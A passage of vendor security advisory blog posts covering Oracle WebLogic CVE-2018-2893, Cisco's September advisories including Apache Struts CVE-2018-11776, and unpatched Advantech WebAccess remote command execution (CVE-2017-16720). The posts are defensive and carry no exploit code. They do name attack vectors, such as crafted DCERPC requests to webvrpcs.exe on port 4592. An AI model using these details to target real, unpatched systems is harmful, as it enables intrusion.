The quick turnaround between disclosure of the vulnerability and exploitation in the wild is worth noting. While it may take months for some vulnerabilities to have a public exploit, some are valuable enough to warrant almost immediate exploitation. Our recent report, Quantifying the Attacker’s First-Mover Advantage, found that 34% of the most prevalent vulnerabilities had an exploit available on the same day they were disclosed publicly.

Vulnerabilities in WebLogic servers have become quite common (there have been nine disclosed so far in 2018, with CVSSv2 scores ranging from 5.8–7.5), and threat actors have been increasingly targeting them in the last year, particularly for mining cryptocurrency. While Oracle has been releasing patches to address these vulnerabilities as they are discovered and disclosed, more than once researchers have found ways to bypass the fixes, further complicating the issue. CVE-2018-2893 continues a vulnerability trend that shows no sign of changing.

The value of cryptomining is a strong motivator for criminals to target these vulnerabilities. In addition to cryptomining, Oracle WebLogic servers are frequently connected to systems containing sensitive data, such as intellectual property or personally identifiable information (PII), which could be tempting targets for attackers.

Vulnerability details

A recently patched flaw discovered in the WebLogic Server Core Components subcomponent of Oracle WebLogic allows a remote, unauthenticated attacker to take complete control over a host. The vulnerability is caused by unsafe deserialization of Java objects, an attack vector that’s been in the news several times in recent years. Using a crafted request over the T3 protocol, an attacker can execute arbitrary code on an affected WebLogic server, leading to full control over that host. Reports have surfaced on social media suggesting there are ways to bypass the patch and continue to exploit a vulnerable host. However, this has yet to be confirmed by Oracle.

Additional information

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Cisco Critical Advisories for September Include Patch for Struts Vulnerability


Cisco has released advisories for 29 issues, including three critical vulnerabilities. The update also includes a patch for CVE-2018-11776 in Apache Struts.

Background

On Wednesday, September 5, Cisco released security advisories for 29 issues, rating three of them as critical. One of these critical vulnerabilities is the Apache Struts vulnerability (CVE-2018-11776) that we wrote about last month. The other two critical vulnerabilities affect Cisco’s Umbrella API (CVE-2018-0435) and several Cisco wireless VPN devices (CVE-2018-0423).

Vulnerability details

While exploitation of the Struts vulnerability is the same as reported in our previous blog, this advisory indicates that the Cisco Identity Services Engine (ISE) is affected.

The Cisco Umbrella API vulnerability, when exploited, could allow an authenticated remote attacker to read and modify data. This vulnerability has already been patched by Cisco and no user action is required.

By exploiting the third critical vulnerability in Cisco wireless VPN devices, a remote attacker sending malicious requests to vulnerable devices can trigger a buffer overflow, which could lead to a Denial of Service (DoS) or execution of arbitrary code. In order to exploit this vulnerability, both the remote management interface and Guest account features must be enabled. However, both of these features are disabled by default.

Urgently required actions

For Cisco ISE users, the related bug and patch information can be found here.

For users with affected Cisco wireless VPN devices, we recommend updating to the latest firmware version for the devices, which can be found in Cisco’s software center.

Identifying affected systems

Tenable has released the following plugins related to these advisories.

Plugin ID   Description
112219      Cisco Identity Services Engine Struts2 Namespace Vulnerability

Get more information

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Tenable Research Advisory: Advantech WebAccess Remote Command Execution Still Exploitable


Tenable Researcher Chris Lyne discovered that Advantech WebAccess versions 8.3, 8.3.1 and 8.3.2 are still vulnerable to the remote command execution vulnerability CVE-2017-16720, which was originally disclosed by ZDI in January 2018 and has a public exploit.

Background

Tenable Research’s Chris Lyne has discovered that Advantech WebAccess remains unprotected against a public exploit several months after a patch was released. Vulnerable WebAccess instances remain susceptible to an unauthenticated remote code execution (RCE) attack (CVE-2017-16720). WebAccess versions 8.3, 8.3.1 and 8.3.2 are affected.

On January 4, 2018, ICS-CERT released ICSA-18-004-02A to detail several vulnerabilities reported for Advantech WebAccess. One of the vulnerabilities, CVE-2017-16720, which was also disclosed by the Zero Day Initiative (ZDI), allows an unauthenticated remote attacker to execute arbitrary system commands.

The mitigation section of the ICS-CERT advisory states, “Advantech has released WebAccess Version 8.3 to address the reported vulnerabilities.” In March, two months after the release of the ICS-CERT advisory, a public exploit leveraging CVE-2017-16720 was published to the Exploit Database.

Vulnerability details

This vulnerability allows for remote command execution via the Remote Procedure Call (RPC) protocol over TCP port 4592. Using crafted Distributed Computing Environment / Remote Procedure Call (DCERPC) requests, an attacker can cause the webvrpcs.exe service to pass command line instructions to the host.

The webvrpcs.exe service runs with administrator access rights, which means an attacker can take control of an asset at that privilege level.

Exploitation

There is a publicly available Proof of Concept (PoC) for this vulnerability. Little additional research would be required for an attacker to utilize this PoC against any WebAccess target.

Since this vulnerability was never effectively patched, and a public exploit has been available for quite some time, even up-to-date assets running WebAccess could have been exploited.

Vendor response

ICS-CERT indicates Advantech has a fix that will be released in September. We will update this section as we get more information, and remediation information becomes available.

Identifying affected systems

Tenable has the following plugin available for identifying vulnerable assets.

Plugin ID   Description
117361      Advantech WebAccess/SCADA Network Service Detection

Learn more:

  • Visit the Tenable Techblog on Medium to read researcher Chris Lyne's in-depth story about his work uncovering this vulnerability.
  • Visit the Tenable Research Advisories page to stay up-to-date on security vulnerabilities in third-party software discovered by a dedicated team supported by researchers and engineers at Tenable.

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.
